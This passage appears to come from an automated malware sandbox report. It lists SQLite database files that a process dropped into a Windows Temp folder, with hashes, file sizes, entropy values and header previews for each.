                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\SHxkeafMFP

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\SKwQPJkqJC

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\SavKbhnhG6

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\SfaCX3UPFW

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ShvgZHQ9Ib

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Sk2HhfC0qg

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\SnUnaokYyl

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\T0zvIlBPSB

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\TR7yDAkeSs

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\ThYUSqDpdj

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\UD40j0laHi

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\UTUuNLGZIe

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\VBFybqLAbF

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\VLprUZ2QzJ

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\VX27bY4CSL

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Vb9G3oCF4U

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\W6T5ciVUZy

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\W6VvxK2Sua

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\WJdOzwCNWF

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\WKDpf6l5jY

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\WRl6Eyb0KX

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\WZcPqeOnjm

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Ws6Zl1rYk4

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\X0Q0ulncfJ

                                                                                Download File
